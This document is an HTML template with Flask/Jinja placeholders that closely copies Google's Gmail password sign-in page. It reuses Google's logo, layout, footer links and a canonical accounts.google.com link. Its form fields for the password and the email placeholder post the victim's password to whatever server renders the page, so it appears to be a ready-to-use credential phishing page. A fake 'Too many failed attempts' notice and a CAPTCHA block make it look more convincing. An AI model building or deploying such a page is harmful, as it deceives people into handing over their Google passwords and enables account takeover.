<!doctype html>
<html lang="en-GB" dir="ltr">
  <head>
    <meta name="referrer" content="origin">
    <link rel="stylesheet" href="{{ url_for('static', filename='main-style.css') }}">
    <link rel="canonical" href="https://accounts.google.com/v3/signin/challenge/pwd">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <title>Gmail</title>
  
  </head>
  <body jscontroller="LDQI" jsaction="rcuQ6b:npT2md; click:FAbpgf; auxclick:FAbpgf" class="nyoS7c UzCXuf">
    <div class="lJXwje S81Pef TFhTPc LZgQXe">
      <div class="fPxNlf v7usYb LZgQXe" id="initialView" role="presentation" jsname="WsjYwc" jscontroller="fJpY1b" jsaction="rcuQ6b:wVXPKc,eyofDf;SlnBXb:r0xNSb;cbwpef:Yd2OHe;rURRne:vYWWBd;bITzcd:wymjWe;Rld2oe:waWwEd;FzgWvd:waWwEd;">
        <div class="rn19nc" aria-hidden="true">
          <div jscontroller="ltDFwf" jsaction="transitionend:Zdx3Re" jsname="Igk6W" role="progressbar" class="sZwd7c B6Vhqe qdulke jK7moc">
            <div class="xcNBHc um3FLe"></div>
            <div jsname="cQwEuf" class="w2zcLc Iq5ZMc"></div>
            <div class="MyvhI TKVRUb" jsname="P1ekSe">
              <span class="l3q5xe SQxu9c"></span>
            </div>
            <div class="MyvhI sUoeld">
              <span class="l3q5xe SQxu9c"></span>
            </div>
          </div>
        </div>
        <div class="rhhJr" jsname="f2d3ae" role="presentation">
          <div class="nM4rkc" id="yDmH0d">
            <c-wiz jsrenderer="jGvTv" class="g98c7c" jsshadow jsdata="deferred-i5" data-p="%.@.1,null,null,null,&quot;https://mail.google.com/mail/&quot;,false]" jscontroller="GLtV1c" jsaction="jiqeKb:ZCwQbe;CDQ11b:n4vmRb;DKwHie:gVmDzc;jR85Td:WtmXg;rcuQ6b:rcuQ6b;click:vBw6I(preventDefault=true|L6M1Fb)" jsname="nUpftc" data-node-index="0;0" jsmodel="hc6Ubd XVq9Qb" view c-wiz>
              <c-wiz jsrenderer="OTcFib" jsshadow jsdata="deferred-i6" data-p="%.@.]" data-node-index="2;0" jsmodel="hc6Ubd" c-wiz>
                <div class="zOO9Bf " jscontroller="Rusgnf" jsname="n7vHCb">
                  <div jsname="jjf7Ff">
                    <div id="logo" class="YNY4de" title="Google">
                      <div class="Bym39d" jsname="l4eHX">
                        <svg viewBox="0 0 75 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" class="BFr46e xduoyf">
                          <g id="qaEJec">
                            <path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z" />
                          </g>
                          <g id="YGlOvc">
                            <path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z" />
                          </g>
                          <g id="BWfIk">
                            <path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z" />
                          </g>
                          <g id="e6m3fd">
                            <path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z" />
                          </g>
                          <g id="vbkDmc">
                            <path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z" />
                          </g>
                          <g id="idEJde">
                            <path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z" />
                          </g>
                        </svg>
                      </div>
                    </div>
                  </div>
                </div>
                <c-data id="i6" jsdata=" eCjdDd;_;3"></c-data>
              </c-wiz>
              <div class="aDGQwe" jsname="bN97Pc" data-use-configureable-escape-action="true" jscontroller="Ctsu" jsshadow role="presentation">
                <div jsname="paFcre">
                  <div class="rQszV " jsname="tJHJj" jscontroller="UPKV3d" jsaction="bTyaEe:pKJJqe(af8ijd);">
                    <h1 class="oO8pQe" data-a11y-title-piece id="headingText" jsname="r4nke">
                      <span jsslot>Welcome</span>
                    </h1>
                    <div class="tosRNd" data-a11y-title-piece id="headingSubtext" jsname="VdSJob"></div>
                    <div class="Wz0RKd">
                      <div jscontroller="ENv7Ef" jsaction="click:cOuCgd; blur:O22p3e; mousedown:UX7yZ; mouseup:lbsD7e; touchstart:p6p2H; touchend:yfqBxc;" class="YZrg6 HnRr5d iiFyne cd29Sd kWC5Rd" tabindex="0" role="link" aria-label="123@gmail.com selected. Switch account" jsname="af8ijd">
                        <div class="gPHLDe">
                          <div class="qQWzTd" aria-hidden="true">
                            <svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="48px" height="48px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                              <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path>
                            </svg>
                          </div>
                        </div>
                        <div jsname="bQIQze" class="KTeGk" data-profile-identifier>{{ email }}</div>
                        <div class="krLnGe">
                          <svg aria-hidden="true" class="stUf5b MSBt4d" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                            <polygon points="12,16.41 5.29,9.71 6.71,8.29 12,13.59 17.29,8.29 18.71,9.71"></polygon>
                          </svg>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
                <div jsname="uybdVe" class="eKnrVb" role="presentation">
                  <div jsname="USBQqe" class="CYBold" role="presentation">
                    <div class="j663ec">
                      <div class="tCpFMc" jsname="rEuO1b" jscontroller="bPkrc">
                        <form method="post" novalidate jsaction="submit:JM9m2e;">
                          <span jsslot>
                            <section class="aTzEhb AORPd rNe0id eLNT1d S7S4N" jscontroller="W2YXuc" data-callout-type="2" jsname="INM6z" aria-live="assertive" aria-atomic="true" jsshadow>
                              <header class="IdEPtc" jsname="tJHJj">
                                <div class="L9iFZc" role="presentation" jsname="NjaE2c">
                                  <h2 class="kV95Wc TrZEUc">
                                    <span class="yiP64c" aria-hidden="true" jsname="Bz112c">
                                      <svg aria-hidden="true" class="stUf5b d7Plee" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                        <path d="M1 21h22L12 2 1 21zm12-3h-2v-2h2v2zm0-4h-2v-4h2v4z"></path>
                                      </svg>
                                    </span>
                                    <span jsslot jsname="Ud7fr">Too many failed attempts</span>
                                  </h2>
                                  <div class="yMb59d" jsname="HSrbLb" aria-hidden="true"></div>
                                </div>
                              </header>
                              <div class="CxRgyd" jsname="MZArnb">
                                <div class="VBGMK" jsslot></div>
                              </div>
                            </section>
                            <section class="aTzEhb " jscontroller="W2YXuc" jsname="dZbRZb" jsshadow>
                              <header class="IdEPtc" jsname="tJHJj" aria-hidden="true"></header>
                              <div class="CxRgyd" jsname="MZArnb">
                                <div class="VBGMK" jsslot>
                                  <c-wiz jsrenderer="PXsWy" jsdata="deferred-i7" data-p="%.@.null,&quot;identity-signin-password&quot;]" jscontroller="qPfo0c" jsname="xdJtEf" data-node-index="1;0" jsmodel="hc6Ubd" c-wiz>
                                    <c-data id="i7" jsdata=" U3wROe;_;6"></c-data>
                                  </c-wiz>
                                  <input type="email" name="identifier" class="F29zPe" tabindex="-1" aria-hidden="true" spellcheck="false" value="123@gmail.com" jsname="KKx9x" autocomplete="off" id="hiddenEmail">
                                  <div class="SdBahf Fjk18" jscontroller="p5Gc0b" jsshadow jsname="vZSTIf" jsaction="rcuQ6b:rcuQ6b;KJ9cZc:nAF18e(EMUunb);" data-is-visible="false">
                                    <div class="eEgeR">
                                      <div class="DPChp">
                                        <div class="Txuhic">
                                          <div class="hDp5Db" jscontroller="bzud8b" jsaction="rcuQ6b:rcuQ6b;" jsname="UmsTj" jsshadow>
                                            <div id="password" class="rFrNMe ze9ebf YKooDc wIXLub zKHdkd sdJrJc" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="Ufn6O">
                                              <div class="aCsJod oJeWuf">
                                                <div class="aXBtI Wic03c">
                                                  {{ form.csrf }}
                                                  <div class="Xb9hP">
                                                    {{ form.password(class="whsOnd zHQkBf", placeholder="") }}
                                                    <div jsname="YRMmle" class="AxOyFc snByac" aria-hidden="true">Enter your password</div>
                                                  </div>
                                                  <div class="i9lrp mIZh1c"></div>
                                                  <div jsname="XmnwAc" class="OabDMe cXrdqd"></div>
                                                </div>
                                              </div>
                                              <div class="LXRPh">
                                                <div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div>
                                              </div>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                    <div class="OyEIQ uSvLId" jsname="h9d3hd" aria-live="polite"></div>
                                    <div class="EcjFDf" jsname="ESjtn">
                                      <div class="IhH7Wd" jsaction="rcuQ6b:xawz9d;RqOcWc:gfO0Le;" jscontroller="Uw3p6b" jsname="EMUunb" jsshadow>
                                        <div class="ci67pc">
                                          <div class="BudEQ rBUW7e" jsaction="click:DKv26d;JIbuQc:vKfede(ornU0b)" jscontroller="KE5dld" jsname="wQNmvb">
                                            <div class="sSzDje NEk0Ve">
                                              <div class="enBDyd ">
                                                <div class="VfPpkd-MPu53c VfPpkd-MPu53c-OWXEXe-dgl2Hf Ne8lhe swXlm az2ine y5MMGc sD2Hod" jscontroller="etBPYb" data-indeterminate="false" jsname="ornU0b" jsaction="click:cOuCgd; clickmod:vhIIDb; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd; contextmenu:mg9Pef;animationend:L9dL9d;dyRcpb:dyRcpb;" data-disable-idom="true" data-value="optioni9">
                                                  <input class="VfPpkd-muHVFf-bMcfAe" type="checkbox" jsname="YPqjbf" jsaction="focus:AHmuwe; blur:O22p3e;change:WPi0i;" data-indeterminate="false" aria-labelledby="selectioni8">
                                                  <div class="VfPpkd-YQoJzd">
                                                    <svg aria-hidden="true" class="VfPpkd-HUofsb" viewBox="0 0 24 24">
                                                      <path class="VfPpkd-HUofsb-Jt5cK" fill="none" d="M1.73,12.91 8.1,19.28 22.79,4.59" />
                                                    </svg>
                                                    <div class="VfPpkd-SJnn3d"></div>
                                                  </div>
                                                  <div class="VfPpkd-OYHm6b"></div>
                                                  <div class="VfPpkd-sMek6-LhBDec"></div>
                                                </div>
                                              </div>
                                              <div class="DVnhEd">
                                                <div jsname="V67aGc" class="wFCloc">
                                                  <div jsslot id="selectioni8" class="d3GVvd jGAaxb" jsname="CeL6Qc">Show password</div>
                                                </div>
                                              </div>
                                            </div>
                                          </div>
                                        </div>
                                        <div aria-atomic="true" aria-live="polite" class="Df4rGb" jsname="h9d3hd">
                                          <div jsslot></div>
                                        </div>
                                      </div>
                                    </div>
                                    <div class="gSlDTe" jsname="JIbuQc"></div>
                                  </div>
                                  <input type="hidden" name="TrustDevice" value="true" jscontroller="kSPLL">
                                  <input type="hidden" name="historicalPassword" value="false" jscontroller="kSPLL">
                                  <div jscontroller="ZUKRxc" jsname="Si5T8b" class="Wzzww eLNT1d" jsaction="PIvFg:IMdg8d;rcuQ6b:jqIVcd">
                                    <div class="OMvKPe">
                                      <img jsname="O9Milc" alt="CAPTCHA image of text used to distinguish humans from robots" id="captchaimg" class="TrZEUc">
                                      <div jscontroller="IZ1fbc" jsaction="click:cOuCgd;JIbuQc:JIbuQc;" jsname="A1U4Sb" class="FliLIb yz7Gpc TrZEUc" id="playCaptchaButton">
                                        <div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true">
                                          <button class="VfPpkd-LgbsSe VfPpkd-LgbsSe-OWXEXe-Bz112c-M1Soyc VfPpkd-LgbsSe-OWXEXe-dgl2Hf ksBjEc lKxP2d LQeN7 uRo0Xe TrZEUc lw1w4b" jscontroller="soHxf" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;mlnRJb:fLiPzd;" data-idom-class="ksBjEc lKxP2d LQeN7 uRo0Xe TrZEUc lw1w4b" jsname="LgbsSe" aria-label="Listen and type the numbers that you hear">
                                            <div class="VfPpkd-Jh9lGc"></div>
                                            <div class="VfPpkd-J1Ukfc-LhBDec"></div>
                                            <div class="VfPpkd-RLmnJb"></div>
                                            <svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="18px" height="18px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                              <path d="M3 9v6h4l5 5V4L7 9H3zm13.5 3c0-1.8-1-3.3-2.5-4v8c1.5-.7 2.5-2.2 2.5-4zM14 3.2v2.1c2.9.9 5 3.5 5 6.7s-2.1 5.9-5 6.7v2.1c4-.9 7-4.5 7-8.8s-3-7.9-7-8.8z"></path>
                                            </svg>
                                            <span jsname="V67aGc" class="VfPpkd-vQzf8d" aria-hidden="true"></span>
                                          </button>
                                        </div>
                                      </div>
                                      <audio jsname="CakGX" type="audio/wav" id="captchaAudio"></audio>
                                    </div>
                                    <div jscontroller="my67ye" jsaction="keydown:C9BaXe;O22p3e:Op2ZO;AHmuwe:Jt1EX;rcuQ6b:rcuQ6b;YqO5N:Lg5SV;rURRne:rcuQ6b;EJh3N:rcuQ6b;" jsname="jKg4ed" class="d2CFce cDSmF" role="presentation">
                                      <div class="rFrNMe N3Hzgf jjwyfe zKHdkd sdJrJc Tyc9J" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="Ufn6O">
                                        <div class="aCsJod oJeWuf">
                                          <div class="aXBtI Wic03c">
                                            <div class="Xb9hP">
                                              <input type="text" class="whsOnd zHQkBf" jsname="YPqjbf" autocomplete="off" spellcheck="false" tabindex="0" aria-label="Type the text that you hear or see" name="ca" id="ca" dir="ltr" data-initial-dir="ltr" data-initial-value="" />
                                              <div jsname="YRMmle" class="AxOyFc snByac" aria-hidden="true">Type the text that you hear or see</div>
                                            </div>
                                            <div class="i9lrp mIZh1c"></div>
                                            <div jsname="XmnwAc" class="OabDMe cXrdqd"></div>
                                          </div>
                                        </div>
                                        <div class="LXRPh">
                                          <div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div>
                                          <div jsname="B34EJ" class="dEOOab RxsGPe" aria-atomic="true" aria-live="assertive"></div>
                                        </div>
                                      </div>
                                    </div>
                                    <input jsname="SBlSod" type="hidden" name="ct" id="ct">
                                  </div>
                                </div>
                              </div>
                            </section>
                            <input type="hidden" name="" value="{{ email }}" jsname="m2Owvb" id="identifierId" jscontroller="kSPLL">
                          </span>
                      </div>
                    </div>
                    <div class="Z6Ep7d" jsname="DH6Rkf" jscontroller="hmHrle" jsaction="rcuQ6b:rcuQ6b;PIvFg:vjx2Ld(Njthtb),ChoyC(eBSUOb),VaKChb(gVmDzc),nCZam(W3Rzrc),Tzaumc(uRHG6),JGhSzd;dcnbp:dE26Sc(lqvTlf);FzgWvd:JGhSzd;" data-is-consent="false" data-is-primary-action-disabled="false" data-is-secondary-action-disabled="false" data-primary-action-label="Next" jsshadow>
                      <div class="dqyqtf" jsname="DhK0U">
                        <div class="F9NWFb" jsname="k77Iif">
                          <div jscontroller="IZ1fbc" jsaction="click:cOuCgd;JIbuQc:JIbuQc;" jsname="Njthtb" class="FliLIb FmFZVc" id="passwordNext">
                            <div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true">
                              {{ form.submit(class="VfPpkd-LgbsSe VfPpkd-LgbsSe-OWXEXe-k8QpJ VfPpkd-LgbsSe-OWXEXe-dgl2Hf nCP5yc AjY5Oe DuMIQc LQeN7 qIypjc TrZEUc lw1w4b") }}
                            </div>
                          </div>
                        </div>
                        <div class="XOrBDc" jsname="QkNstf">
                          <div jscontroller="IZ1fbc" jsaction="click:cOuCgd;JIbuQc:JIbuQc;" jsname="gVmDzc" class="FliLIb sbGPcf" id="forgotPassword">
                            <div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true">
                              <button class="VfPpkd-LgbsSe VfPpkd-LgbsSe-OWXEXe-dgl2Hf ksBjEc lKxP2d LQeN7 uRo0Xe TrZEUc lw1w4b" jscontroller="soHxf" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;mlnRJb:fLiPzd;" data-idom-class="ksBjEc lKxP2d LQeN7 uRo0Xe TrZEUc lw1w4b" jsname="LgbsSe">
                                <div class="VfPpkd-Jh9lGc"></div>
                                <div class="VfPpkd-J1Ukfc-LhBDec"></div>
                                <div class="VfPpkd-RLmnJb"></div>
                                <span jsname="V67aGc" class="VfPpkd-vQzf8d">Forgot password?</span>
                              </button>
                            </div>
                          </div>
                        </div>
                      </form>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <c-data id="i5" jsdata=" SnOFNc;_;1 tEzfhe;_;5 Rf8b0c;_;4 VY6Opb;_;7"></c-data>
            </c-wiz>
  </body>
</html>
<div id="ZCHFDb"></div>
</div>
</div>
<c-wiz jsrenderer="ZdRp7e" jsshadow jsdata="deferred-i1" data-node-index="0;0" jsmodel="hc6Ubd" c-wiz>
  <footer class="g9mjtf">
    <div class="V7i3mf" jscontroller="mWLH9d" jsaction="rcuQ6b:npT2md;OmFrlf:VPRXbd">
      <div jsshadow class="O1htCb-H9tDt" jsname="rfCUpd" jscontroller="yRXbo" jsaction="bITzcd:KRVFmb;iFFCZc:Y0y4c;Rld2oe:gDkf4c;EDR5Je:QdOKJc;FzgWvd:RFVo1b">
        <div jsname="wSASue" class="VfPpkd-O1htCb VfPpkd-O1htCb-OWXEXe-INsAgc VfPpkd-O1htCb-OWXEXe-di8rgd-V67aGc ReCbLb UAQDDf">
          <div class="VfPpkd-TkwUic" jsname="oYxtQd" jsaction="focus:AHmuwe; blur:O22p3e; click:cOuCgd; keydown:I481le; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd;" aria-autocomplete="none" role="combobox" tabindex="0" aria-haspopup="listbox" aria-expanded="false" aria-labelledby="null i2" aria-controls="i4" aria-describedby="">
            <span jscontroller="bTi8wc" class="VfPpkd-NSFCdd-i5vt6e VfPpkd-NSFCdd-i5vt6e-OWXEXe-NSFCdd VfPpkd-NSFCdd-i5vt6e-OWXEXe-di8rgd-V67aGc" jsname="B9mpmd">
              <span class="VfPpkd-NSFCdd-Brv4Fb"></span>
              <span class="VfPpkd-NSFCdd-MpmGFe"></span>
            </span>
            <span class="VfPpkd-uusGie-fmcmS-haAclf" aria-hidden="true">
              <span id="i2" class="VfPpkd-uusGie-fmcmS" jsname="Fb0Bif">English (United Kingdom)</span>
            </span>
            <span class="VfPpkd-t08AT-Bz112c">
              <svg class="VfPpkd-t08AT-Bz112c-Bd00G" viewBox="7 10 10 5" focusable="false">
                <polygon class="VfPpkd-t08AT-Bz112c-mt1Mkb" stroke="none" fill-rule="evenodd" points="7 10 12 15 17 10"></polygon>
                <polygon class="VfPpkd-t08AT-Bz112c-auswjd" stroke="none" fill-rule="evenodd" points="7 15 12 10 17 15"></polygon>
              </svg>
            </span>
            <span id="i4" style="display: none" aria-hidden="true" role="listbox"></span>
          </div>
          <div class="VfPpkd-xl07Ob-XxIAqe VfPpkd-xl07Ob-XxIAqe-OWXEXe-tsQazb VfPpkd-xl07Ob  VfPpkd-YPmvEd s8kOBc dmaMHc" jsname="xl07Ob" jscontroller="ywOR5c" jsaction="keydown:I481le;JIbuQc:j697N(rymPhb);XVaHYd:c9v4Fb(rymPhb);Oyo5M:b5fzT(rymPhb);DimkCe:TQSy7b(rymPhb);m0LGSd:fAWgXe(rymPhb);WAiFGd:kVJJuc(rymPhb);" data-is-hoisted="false" data-should-flip-corner-horizontally="false" data-menu-uid="ucj-1">
            <ul class="VfPpkd-rymPhb r6B9Fd bwNLcf P2Hi5d VfPpkd-OJnkse" jsname="rymPhb" jscontroller="PHUIyb" jsaction="mouseleave:JywGue; touchcancel:JMtRjd; focus:AHmuwe; blur:O22p3e; keydown:I481le;" role="listbox" tabindex="-1" aria-label="Change language" data-evolution="true" data-disable-idom="true">
              <span class="VfPpkd-BFbNVe-bF1uUb NZp2ef" aria-hidden="true"></span>
              <li class="MCs1Pd HiC7Nc VfPpkd-OkbHre VfPpkd-aJasdd-RWgCYc-wQNmvb VfPpkd-rymPhb-ibnC6b VfPpkd-rymPhb-ibnC6b-OWXEXe-gk6SMd VfPpkd-rymPhb-ibnC6b-OWXEXe-SfQLQb-Woal0c-RWgCYc" jsaction="click:o6ZaF;keydown:RDtNu; keyup:JdS61c; focusin:MeMJlc; focusout:bkTmIf;mousedown:teoBgf; mouseup:NZPHBc; mouseenter:SKyDAe; mouseleave:xq3APb; touchstart:jJiBRc; touchmove:kZeBdd; touchend:VfAz8; change:uOgbud;" role="option" aria-selected="true" tabindex="-1" aria-selected="true" data-value="en-GB" data-708c49e2-dcf0-4d62-b457-88577bfe3081="English (United Kingdom)">
                <span class="VfPpkd-rymPhb-pZXsl"></span>
                <span class="VfPpkd-rymPhb-Gtdoyb">
                  <span class="VfPpkd-rymPhb-fpDzbe-fmcmS" jsname="K4r5Ff">English (United Kingdom)</span>
                </span>
              </li>
            
            </ul>
          </div>
        </div>
      </div>
    </div>
    <ul class="kJOS4">
      <li class="r7XTUb">
        <a class="NUwdAb TrZEUc" href="https://support.google.com/accounts?hl=en-GB&amp;p=account_iph" target="_blank">Help</a>
      </li>
      <li class="r7XTUb">
        <a class="NUwdAb TrZEUc" href="https://accounts.google.com/TOS?loc=PK&amp;hl=en-GB&amp;privacy=true" target="_blank">Privacy</a>
      </li>
      <li class="r7XTUb">
        <a class="NUwdAb TrZEUc" href="https://accounts.google.com/TOS?loc=PK&amp;hl=en-GB" target="_blank">Terms</a>
      </li>
    </ul>
  </footer>
  <c-data id="i1" jsdata=" OsjLy;_;2"></c-data>
</c-wiz>
<script aria-hidden="true" nonce="ctGmeo5VcsZa4PA78sBnPw">
  window.wiz_progress && window.wiz_progress();
  window.wiz_tick && window.wiz_tick('ZdRp7e');
</script>
</div>
<div class="iNstf" aria-hidden="true"></div>
</div>